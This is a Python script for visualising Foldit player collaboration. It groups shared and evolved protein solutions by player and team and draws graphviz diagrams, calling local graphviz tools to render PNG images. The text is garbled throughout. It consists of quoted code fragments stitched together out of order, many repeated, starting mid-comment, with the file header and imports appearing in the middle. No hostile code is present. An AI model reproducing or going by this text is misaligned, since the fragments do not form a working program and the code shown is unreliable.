do it again, this time for people who just loaded", "= uids[:] for prev_uid, color in group_colors.items(): colors.remove(color) if prev_uid in new_uids: new_uids.remove(prev_uid)", "List[\"Collaborator\"] def get_tag(s: PDB_Info) -> ShareTag: return ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s: PDB_Info)", "== 0 and x.scoretype == '2' and x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda", "actively evolved # # evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, #", "axis=1) evol_lines_lookup = {uid: get_data_value(uid, pid, \"evol_target_lines\", df) for uid in df.uid} euid_lookup", "pid in data.pid.unique(): logging.debug(\"getting team structures for {}\".format(pid)) df = data[data.pid == pid]", "# evoling_start = min(e.timestamp for e in evolves) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1", "list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for prev_uid, color in group_colors.items(): colors.remove(color) if", "= {target for targets in uid_source_grouped.values() for target in targets} roots = sum(([p", "c.energy * c.weight for c in best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab, root_tag, [])", "in shared.items(): gid = pdbs[0].gid for p in pdbs: if p.scoretype == '2'", "evolves_by_source and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children def get_team_structures(data, soln_lookup,", "gid: str pdbs: List[PDB_Info] energy_comps: Dict[str, float] tag: ShareTag parent: \"Collaborator\" source: ShareTag", "- start), 0.7) # evolving_time = sum(get_sessions([e.timestamp for e in evolves]) group_clusters[gid].edge(\"{} on", "ShareTag, collab: Collaborator, evolves_by_source: dict) -> List[Collaborator]: children = [] for uid, pdbs", "-array_c{} | neato -Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True) class ShareTag(NamedTuple):", "group_colors.items(): colors.remove(color) if prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert len(colors) >=", "in l.pdb_infos] if r.lines else []) + ([p for l in r.evol_target_lines for", "{ # uid: {k: min(g, key=lambda p: p.energy) for k, g in #", "\"box\" if p.scoretype == '1' or is_corrupted(p.pdl, p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy),", "[]) evolves_by_source = {tag: list(pdbs) for tag, pdbs in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)),", "and x.scoretype == '2' and x.pdl[-1]['actions'] == {}]), [])) # map gids to", "for uid, evolved_targets in uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid)", "= df.apply(lambda r: sorted(([p for l in r.lines for p in l.pdb_infos] if", "dot.subgraph(cluster) # output raw source, then use command line graphviz tools to fix", "in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for x in d if int(x.sharing_gid) >", "import matplotlib.pyplot as plt from graphviz import Digraph from concurrent.futures import ProcessPoolExecutor from", "groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for x in d if int(x.sharing_gid) > 1", "in uid_grouped} # further group by source active_uids = list(uid_source_grouped.keys()) # evolver_clusters =", "fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster in group_clusters.values(): dot.subgraph(cluster) # output raw source, then", "evolver lines for {}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source: dict)", "= list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for target, evolve in evolved_targets.items(): #", "or p['header']['uid'] == uid or p['header']['uid'] == '0' or p['header']['score'] == 9999.99 for", "[] for root in roots: tag = get_tag(root) sids = get_relevant_sids(root, soln_lookup, child_lookup)", "= list(uid_source_grouped.keys()) # evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)})", "= {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x for x", "df.apply(lambda r: sorted(([p for l in r.lines for p in l.pdb_infos] if r.lines", "get_source_tag(s: PDB_Info) -> ShareTag: source = get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s:", "pid] pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines for p in", "plt.get_cmap('tab10' if len(gids) <= 10 else 'tab20') # for gid, c in zip(gids,", "tag, xs in evolves_by_source.items()} collabs[pid] = [] for root in roots: tag =", "e: e.uid) # group by evolver uid_source_grouped = { uid: {k: list(g) for", "-o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True) class ShareTag(NamedTuple): uid: str energy: float class", "start = df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r: sorted(([p for l", "on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if min(e.energy for e in", "tag = get_tag(root) sids = get_relevant_sids(root, soln_lookup, child_lookup) collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid]", "csv import json import logging from itertools import groupby import pandas as pd", "lambda e: get_source_tag(e))} for uid, g in uid_grouped} # further group by source", "for e in evolves))) # evoling_start = min(e.timestamp for e in evolves) #", "shared.values()] + [get_source(e)['header']['gid'] for e in active_evolves + passive_evolves]) # cm = plt.get_cmap('tab10'", "# node_attr={'style': 'filled'}) as c: for p in pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in", "pdb_infos if not is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors = {} for pid in", "p['header']['uid'] == uid or p['header']['uid'] == '0' or p['header']['score'] == 9999.99 for p", "pdbs: List[PDB_Info] energy_comps: Dict[str, float] tag: ShareTag parent: \"Collaborator\" source: ShareTag children: List[\"Collaborator\"]", "uid): return all(p['actions'] == {} or p['header']['uid'] == uid or p['header']['uid'] == '0'", "(end - start), 0.7) # evolving_time = sum(get_sessions([e.timestamp for e in evolves]) group_clusters[gid].edge(\"{}", "set([xs[0].gid for xs in shared.values()] + [get_source(e)['header']['gid'] for e in active_evolves + passive_evolves])", "'2' and x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid])", "import groupby import pandas as pd import numpy as np import matplotlib.pyplot as", "for pid in data.pid.unique(): print(pid) df = data[data.pid == pid] start = df.timestamps.apply(min).min()", "== {} or p['header']['uid'] == uid or p['header']['uid'] == '0' or p['header']['score'] ==", "evolving_time = sum(get_sessions([e.timestamp for e in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2", "== {} or cands[i]['header']['uid'] == e.uid: i += 1 return cands[i] def col_to_str(col):", "in evolver_clusters.values(): # dot.subgraph(sg) # nodes and edges for shared solutions for uid,", "for c in root.energy_components}, tag, None, None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return", "x in pdb_infos if not is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors = {} for", "== uid or p['header']['uid'] == '0' or p['header']['score'] == 9999.99 for p in", "== '2' and not is_corrupted(p.pdl, p.uid): source = get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28,", "axis=1) shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x", "shared.items(): gid = pdbs[0].gid for p in pdbs: if p.scoretype == '2' and", "'0' or p['header']['score'] == 9999.99 for p in pdl) def remove_corrupted(pdb_infos): return [x", "pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in evolved: shape = \"box\" if p.scoretype == '1'", "k, g in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for", "= {tag: list(pdbs) for tag, pdbs in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda s:", "in data.pid.unique(): print(pid) df = data[data.pid == pid] start = df.timestamps.apply(min).min() end =", "if len(gids) <= 10 else 'tab20') # for gid, c in zip(gids, cm.colors):", "lambda d: [x for x in d if int(x.sharing_gid) > 1]), []), key=lambda", "ntab, cur = front.pop() # print(\" \"*ntab, cur.tag) # front.extend([(ntab + 1, c)", "shared solutions for uid, pdbs in shared.items(): gid = pdbs[0].gid for p in", "sg in evolver_clusters.values(): # dot.subgraph(sg) # do it again, this time for people", "node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid in", "\"*ntab, cur.tag) # front.extend([(ntab + 1, c) for c in cur.children]) if __name__", "group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if min(e.energy for e", "for gid, uids in groups_uids.items(): cdict[gid] = {} group_colors = user_colors.setdefault(gid, {}) colors", "and edges for shared solutions for uid, pdbs in shared.items(): gid = pdbs[0].gid", "solution but didn't do anything # uid_grouped = groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda", "uid_source_grouped = { # uid: {k: min(g, key=lambda p: p.energy) for k, g", "dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'})", "{k: min(g, key=lambda p: p.energy) for k, g in # groupby(sorted(g, key=lambda e:", "__name__ == '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args = parser.parse_args()", "uids[:] for prev_uid, color in group_colors.items(): colors.remove(color) if prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid]", "it again, this time for people who just loaded in a shared solution", "is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors = {} for pid in data.pid.unique(): print(pid) df", "further group by source active_uids = list(uid_source_grouped.keys()) # evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), #", "graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid in gids} # for uid, evolved_targets in uid_source_grouped.items():", "not in active_uids} # screen out anyone who later actively evolved # #", "= get_relevant_sids(root, soln_lookup, child_lookup) collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid in sids]", "df) for uid in df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in", "0: # ntab, cur = front.pop() # print(\" \"*ntab, cur.tag) # front.extend([(ntab +", "group by source evolved_targets = {target for targets in uid_source_grouped.values() for target in", "return ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s: PDB_Info) -> ShareTag: source = get_source(s) return", "None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return collabs # for collab in sorted(collabs['2003642'],", "nodes & edges uid_grouped = groupby(sorted(active_evolves, key=lambda e: e.uid), lambda e: e.uid) #", "evolved_targets = {target for targets in uid_source_grouped.values() for target in targets} roots =", "source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for uid, pdbs in", "use command line graphviz tools to fix cluster layout outname = \"collab_viz/collab_{}\".format(pid) with", "graphviz import Digraph from concurrent.futures import ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids from util", "[]))), lambda p: p[0])} for gid, uids in groups_uids.items(): cdict[gid] = {} group_colors", "if min(e.energy for e in evolves) >= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True", "p.scoretype == '1' or is_corrupted(p.pdl, p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape,", "= argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args = parser.parse_args() if args.debug: for pid", "p.energy) child = Collaborator(uid, collab.gid, pdbs, {c.name: c.energy * c.weight for c in", "as np import matplotlib.pyplot as plt from graphviz import Digraph from concurrent.futures import", "euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values, [])} shared = {uid:", "for uid, g in uid_grouped} # further group by source active_uids = list(uid_source_grouped.keys())", "key=lambda p: p.timestamp), axis=1) evol_lines_lookup = {uid: get_data_value(uid, pid, \"evol_target_lines\", df) for uid", "c) for c in collab.children] # while len(front) > 0: # ntab, cur", "for pid in data.pid.unique(): logging.debug(\"getting team structures for {}\".format(pid)) df = data[data.pid ==", "{} group_colors = user_colors.setdefault(gid, {}) colors = [col_to_str(c) for c in list(plt.get_cmap('tab20').colors) +", "dict) -> List[Collaborator]: children = [] for uid, pdbs in evolves_by_source[root_tag].items(): best =", "d: [x for x in d if x.scoretype == '2' and x.pdl[-1]['actions']]), []))", "[get_source(e)['header']['gid'] for e in active_evolves + passive_evolves]) # cm = plt.get_cmap('tab10' if len(gids)", "for c in collab.children] # while len(front) > 0: # ntab, cur =", "child_lookup) collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid in sids] if sids else", "= [(1, c) for c in collab.children] # while len(front) > 0: #", "source['header']['score'])] = True for uid, pdbs in shared.items(): gid = pdbs[0].gid num_ignored =", "lambda p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d", "e in active_evolves + passive_evolves]) # cm = plt.get_cmap('tab10' if len(gids) <= 10", "pdbs: if get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return", "for k, g in # groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e:", "evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in evolves))) #", "gid = pdbs[0].gid for p in pdbs: if p.scoretype == '2' and not", "not is_corrupted(p.pdl, p.uid): source = get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9", "logging from itertools import groupby import pandas as pd import numpy as np", "[x for x in d if int(x.sharing_gid) > 1]), []), key=lambda p: euid_lookup[p.sid]),", "further group by source evolved_targets = {target for targets in uid_source_grouped.values() for target", "from itertools import groupby import pandas as pd import numpy as np import", "= groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda e: e.uid) # uid_source_grouped = { #", "uid: {k: list(g) for k, g in groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda e:", "str pdbs: List[PDB_Info] energy_comps: Dict[str, float] tag: ShareTag parent: \"Collaborator\" source: ShareTag children:", "gid in gids} # for uid, evolved_targets in uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid", "evolves_by_source = {tag: list(pdbs) for tag, pdbs in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda", "start) / (end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy),", "data.pid.unique(): print(pid) df = data[data.pid == pid] start = df.timestamps.apply(min).min() end = df.timestamps.apply(max).max()", "in r.lines for p in l.pdb_infos] if r.lines else []) + ([p for", "= {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid in groups_uids} evolved = {} #", "s: get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source = {tag: {uid: list(pdbs) for uid, pdbs", "1 or (int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1][ 'actions'])]), []))),", "\"ccomps -xC {} | dot | gvpack -array_c{} | neato -Tpng -n2 -o", "# for gid in gids} for uid, evolved_targets in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid", "collab.gid, pdbs, {c.name: c.energy * c.weight for c in best.energy_components}, ShareTag(uid, round(best.energy, 4)),", "'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as c: for p in pdbs: if \"{}@{:.2f}\".format(uid,", "evolves_by_source)) return children def get_team_structures(data, soln_lookup, child_lookup): collabs = {} for pid in", "# cm = plt.get_cmap('tab10' if len(gids) <= 10 else 'tab20') # for gid,", "l in r.lines for p in l.pdb_infos] if r.lines else []) + ([p", "e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in uid_grouped} #", "for k, g in groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda e: get_source_tag(e))} for uid,", "{}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in evolves))) # evoling_start = min(e.timestamp", "0.9 * (evoling_start - start) / (end - start), 0.7) # evolving_time =", "key=lambda p: p.energy) child = Collaborator(uid, collab.gid, pdbs, {c.name: c.energy * c.weight for", "c.energy * c.weight for c in root.energy_components}, tag, None, None, []) collab.children.extend(get_collab_children(tag, collab,", "0 and x.scoretype == '2' and x.pdl[-1]['actions'] == {}]), [])) # map gids", "c in cur.children]) if __name__ == '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids',", "in gids} # for uid, evolved_targets in uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid #", "evolves_by_source: dict) -> List[Collaborator]: children = [] for uid, pdbs in evolves_by_source[root_tag].items(): best", "get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info, lines: list) -> str: if", "pdbs if \"{}@{:.2f}\".format(uid, p.energy) not in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared", "if int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions'] == {}]), []))", "{} | dot | gvpack -array_c{} | neato -Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1,", "p.timestamp), axis=1) evol_lines_lookup = {uid: get_data_value(uid, pid, \"evol_target_lines\", df) for uid in df.uid}", "{}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source: dict) -> List[Collaborator]: children", "group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\")", "evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster in group_clusters.values(): dot.subgraph(cluster) #", "p.energy) not in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored),", "[] for uid, pdbs in evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda p: p.energy) child", "this time for people who just loaded in a shared solution but didn't", "groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda e: get_source_tag(e))} for uid, g in uid_grouped} #", "[soln_lookup[sid] for sid in sids] if sids else [], {c.name: c.energy * c.weight", "= set([xs[0].gid for xs in shared.values()] + [get_source(e)['header']['gid'] for e in active_evolves +", "group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid in groups_uids} evolved = {}", "for p in l.pdb_infos] if r.lines else []) + ([p for l in", "for gid in groups_uids} evolved = {} # create evolver nodes & edges", "\"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if min(e.energy for e in evolves) >= target[1]", "p in pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in evolved: shape = \"box\" if p.scoretype", "active_uids} # screen out anyone who later actively evolved # # evolver_clusters =", "{} or cands[i]['header']['uid'] == e.uid: i += 1 return cands[i] def col_to_str(col): return", "for shared solutions for uid, pdbs in shared.items(): gid = pdbs[0].gid for p", "len([p for p in pdbs if \"{}@{:.2f}\".format(uid, p.energy) not in evolved]) # with", "itertools import groupby import pandas as pd import numpy as np import matplotlib.pyplot", "target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e", "group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for", "evolver_clusters.values(): # dot.subgraph(sg) # do it again, this time for people who just", "child, evolves_by_source)) return children def get_team_structures(data, soln_lookup, child_lookup): collabs = {} for pid", "as c: for p in pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in evolved: shape =", "outname = \"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as out: out.write(dot.source) subprocess.run( \"ccomps -xC {}", "pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines for p in l.pdb_infos]", "else []), key=lambda p: p.timestamp), axis=1) shared = {uid: list(pdbs) for uid, pdbs", "e: get_source_tag(e)), lambda e: get_source_tag(e))} for uid, g in uid_grouped} # further group", "+ [get_source(e)['header']['gid'] for e in active_evolves + passive_evolves]) # cm = plt.get_cmap('tab10' if", "Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for gid in gids} for", "4)) def get_evolver_uid(s: PDB_Info, lines: list) -> str: if s.scoretype == \"1\": return", "<filename>foldit/collab_viz.py<gh_stars>0 import colorsys import subprocess import argparse import os import csv import json", "False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for uid, pdbs in shared.items(): gid = pdbs[0].gid", "by source evolved_targets = {target for targets in uid_source_grouped.values() for target in targets}", "num_ignored), 'forcelabels': 'true', # 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as c:", "'0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)})", "c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag) # front = [(1, c) for c in", "- start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])]", "df = data[data.pid == pid] pdb_infos = df.apply(lambda r: sorted(([p for l in", "{ uid: {k: list(g) for k, g in groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda", "shell=True, check=True) class ShareTag(NamedTuple): uid: str energy: float class Collaborator(NamedTuple): uid: str gid:", "for p in l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) evol_lines_lookup", "if x.scoretype == '2' and x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]),", "'__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args = parser.parse_args() if args.debug:", "evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in", "in groupby(sorted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid) > 1]),", "0xff))) def is_corrupted(pdl, uid): return all(p['actions'] == {} or p['header']['uid'] == uid or", "*target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in evolves))) # evoling_start = min(e.timestamp for", "pid, \"evol_target_lines\", df) for uid in df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for", "{c.name: c.energy * c.weight for c in best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab, root_tag,", "parent: \"Collaborator\" source: ShareTag children: List[\"Collaborator\"] def get_tag(s: PDB_Info) -> ShareTag: return ShareTag(s.uid,", "c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag) # front = [(1, c) for c", "evolved # # evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label':", "else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster in group_clusters.values(): dot.subgraph(cluster) # output raw", "nargs='+') args = parser.parse_args() if args.debug: for pid in args.pids: render_collab(pid) else: with", "evolve in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True #", "uid or p['header']['uid'] == '0' or p['header']['score'] == 9999.99 for p in pdl)", "pdbs in shared.items(): gid = pdbs[0].gid num_ignored = len([p for p in pdbs", "ignored)\".format(uid, num_ignored), 'forcelabels': 'true', # 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as", "euid_lookup[e.sid]) # group by evolver uid_source_grouped = { uid: {k: list(g) for k,", "r.lines else []) + ([p for l in r.evol_target_lines for p in l.pdb_infos]", "== 9999.99 or cands[i]['actions'] == {} or cands[i]['header']['uid'] == e.uid: i += 1", "cm.colors): # cdict[gid] = col_to_str(c) groups_uids = {gid: [uid for _, uid in", "0.1 + 0.9 * (evoling_start - start) / (end - start), 0.7) #", "but didn't do anything # uid_grouped = groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda e:", "if \"{}@{:.2f}\".format(uid, p.energy) in evolved: shape = \"box\" if p.scoretype == '1' or", "e.uid: i += 1 return cands[i] def col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\" %", "gids to colors cdict = {} # gids = set([xs[0].gid for xs in", "best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab, root_tag, []) children.append(child) for pdb in pdbs: if", "label=uid) for target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy", "in active_uids} # screen out anyone who later actively evolved # # evolver_clusters", "[p.sid for p in line.pdb_infos] if s.sid in sids: return s.uid + \"evol\"", "'{}_active_evolvers'.format(gid)}) # for gid in gids} for uid, evolved_targets in uid_source_grouped.items(): gid =", "for tag, xs in evolves_by_source.items()} collabs[pid] = [] for root in roots: tag", "pdbs in shared.items(): gid = pdbs[0].gid for p in pdbs: if p.scoretype ==", "who just loaded in a shared solution but didn't do anything # uid_grouped", "<= 10 else 'tab20') # for gid, c in zip(gids, cm.colors): # cdict[gid]", "# evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target),", "or cands[i]['actions'] == {} or cands[i]['header']['uid'] == e.uid: i += 1 return cands[i]", "{}]), [])) # map gids to colors cdict = {} # gids =", "sid in sids] if sids else [], {c.name: c.energy * c.weight for c", "tag: ShareTag parent: \"Collaborator\" source: ShareTag children: List[\"Collaborator\"] def get_tag(s: PDB_Info) -> ShareTag:", "evolved: shape = \"box\" if p.scoretype == '1' or is_corrupted(p.pdl, p.uid) else \"diamond\"", "groups_uids = {gid: [uid for _, uid in g] for gid, g in", "e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) # group by evolver uid_source_grouped = { uid:", "# groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid,", "list(g) for k, g in groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda e: get_source_tag(e))} for", "in d if int(x.sharing_gid) > 1]), []), key=lambda p: p.uid), lambda p: p.uid)}", "from typing import NamedTuple, Tuple, List, Dict import matplotlib matplotlib.use(\"Agg\") def get_source(e): cands", "x: euid_lookup[x.sid])} for tag, xs in evolves_by_source.items()} collabs[pid] = [] for root in", "{k: list(g) for k, g in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e:", "e.uid) # uid_source_grouped = { # uid: {k: min(g, key=lambda p: p.energy) for", "-n2 -o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True) class ShareTag(NamedTuple): uid: str energy: float", "open(outname, 'w') as out: out.write(dot.source) subprocess.run( \"ccomps -xC {} | dot | gvpack", "raise ValueError(\"evolver pdb {} not found in any evolver lines for {}\".format(s.sid, (s.uid,", "evolves_by_source.items()} collabs[pid] = [] for root in roots: tag = get_tag(root) sids =", "for e in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\"", "outname), shell=True, check=True) class ShareTag(NamedTuple): uid: str energy: float class 